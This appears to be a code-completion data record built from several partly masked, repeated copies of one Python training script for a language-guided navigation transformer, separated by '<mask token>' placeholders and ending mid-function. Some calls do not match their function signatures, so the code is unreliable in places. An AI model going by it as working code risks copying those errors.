false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
<mask token>
| <mask token>
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
if debug_image_top_k < 0:
debug_image_top_k = None
if debug_image_threshold < 0:
debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = 'cpu'
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f'cuda:{free_gpu_id}'
device = torch.device(device)
print(f'On device {device}')
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=
args.out_path, path_width=args.path_width, read_limit=args.
read_limit, batch_size=args.batch_size, max_len=args.max_len,
tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,
is_bert='bert' in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath('vocab.json')
) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:
json.dump(list(train_vocab), f1)
else:
print(f'Reading vocab from {checkpoint_dir}')
with open(checkpoint_dir.joinpath('vocab.json')) as f1:
train_vocab = json.load(f1)
print(f'got data')
print(f'constructing model...')
if args.embedder == 'random':
embedder = RandomEmbedder(tokenizer, train_vocab, args.
embedding_dim, trainable=True)
elif args.embedder == 'glove':
embedder = GloveEmbedder(tokenizer, train_vocab, args.
embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith('bert'):
embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.
max_len)
else:
raise NotImplementedError(f'No embedder {args.embedder}')
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size=args.resolution, patch_size=args.
patch_size, language_embedder=embedder, n_layers=args.n_layers,
channels=args.channels, n_heads=args.n_heads, hidden_dim=args.
hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout
=args.embed_dropout, output_type=args.output_type,
positional_encoding_type=args.pos_encoding_type, device=device,
log_weights=args.test, locality_mask=args.locality_mask,
locality_neighborhood=args.locality_neighborhood, init_scale=args.
init_scale)
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=
args.warmup, factor=args.lr_factor)
best_epoch = -1
block_size = int(args.resolution * 4 / 64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
try:
assert len(glob.glob(os.path.join(args.checkpoint_dir,
'*.th'))) == 0
except AssertionError:
raise AssertionError(
f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'
)
else:
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).
joinpath('best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
best_checkpoint_data = json.load(open(pathlib.Path(args.
checkpoint_dir).joinpath('best_training_state.json')))
print(f'best_checkpoint_data {best_checkpoint_data}')
best_epoch = best_checkpoint_data['epoch']
with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),
'w') as f1:
dump_args = copy.deepcopy(args)
del dump_args.__dict__['cfg']
del dump_args.__dict__['__cwd__']
del dump_args.__dict__['__path__']
to_dump = dump_args.__dict__
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
print(f'loading model weights from {args.checkpoint_dir}')
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(
'best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,
encoder=encoder, optimizer=optimizer, scheduler=scheduler,
num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,
checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.
checkpoint_every, validation_limit=args.validation_limit,
num_models_to_keep=args.num_models_to_keep, generate_after_n=args.
generate_after_n, score_type=args.score_type, depth=depth,
resolution=args.resolution, output_type=args.output_type,
patch_size=args.patch_size, block_size=block_size, best_epoch=
best_epoch, seed=args.seed, zero_weight=args.zero_weight,
debug_image_top_k=args.debug_image_top_k, debug_image_threshold=
args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f'evaluating')
acc = trainer.evaluate()
print(f'accuracy: {acc}')
<mask token>
| <mask token>
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
if debug_image_top_k < 0:
debug_image_top_k = None
if debug_image_threshold < 0:
debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = 'cpu'
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f'cuda:{free_gpu_id}'
device = torch.device(device)
print(f'On device {device}')
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=
args.out_path, path_width=args.path_width, read_limit=args.
read_limit, batch_size=args.batch_size, max_len=args.max_len,
tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,
is_bert='bert' in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath('vocab.json')
) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:
json.dump(list(train_vocab), f1)
else:
print(f'Reading vocab from {checkpoint_dir}')
with open(checkpoint_dir.joinpath('vocab.json')) as f1:
train_vocab = json.load(f1)
print(f'got data')
print(f'constructing model...')
if args.embedder == 'random':
embedder = RandomEmbedder(tokenizer, train_vocab, args.
embedding_dim, trainable=True)
elif args.embedder == 'glove':
embedder = GloveEmbedder(tokenizer, train_vocab, args.
embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith('bert'):
embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.
max_len)
else:
raise NotImplementedError(f'No embedder {args.embedder}')
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size=args.resolution, patch_size=args.
patch_size, language_embedder=embedder, n_layers=args.n_layers,
channels=args.channels, n_heads=args.n_heads, hidden_dim=args.
hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout
=args.embed_dropout, output_type=args.output_type,
positional_encoding_type=args.pos_encoding_type, device=device,
log_weights=args.test, locality_mask=args.locality_mask,
locality_neighborhood=args.locality_neighborhood, init_scale=args.
init_scale)
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=
args.warmup, factor=args.lr_factor)
best_epoch = -1
block_size = int(args.resolution * 4 / 64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
try:
assert len(glob.glob(os.path.join(args.checkpoint_dir,
'*.th'))) == 0
except AssertionError:
raise AssertionError(
f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'
)
else:
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).
joinpath('best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
best_checkpoint_data = json.load(open(pathlib.Path(args.
checkpoint_dir).joinpath('best_training_state.json')))
print(f'best_checkpoint_data {best_checkpoint_data}')
best_epoch = best_checkpoint_data['epoch']
with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),
'w') as f1:
dump_args = copy.deepcopy(args)
del dump_args.__dict__['cfg']
del dump_args.__dict__['__cwd__']
del dump_args.__dict__['__path__']
to_dump = dump_args.__dict__
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
print(f'loading model weights from {args.checkpoint_dir}')
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(
'best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,
encoder=encoder, optimizer=optimizer, scheduler=scheduler,
num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,
checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.
checkpoint_every, validation_limit=args.validation_limit,
num_models_to_keep=args.num_models_to_keep, generate_after_n=args.
generate_after_n, score_type=args.score_type, depth=depth,
resolution=args.resolution, output_type=args.output_type,
patch_size=args.patch_size, block_size=block_size, best_epoch=
best_epoch, seed=args.seed, zero_weight=args.zero_weight,
debug_image_top_k=args.debug_image_top_k, debug_image_threshold=
args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f'evaluating')
acc = trainer.evaluate()
print(f'accuracy: {acc}')
if __name__ == '__main__':
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
| <mask token>
logger = logging.getLogger(__name__)
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
if debug_image_top_k < 0:
debug_image_top_k = None
if debug_image_threshold < 0:
debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
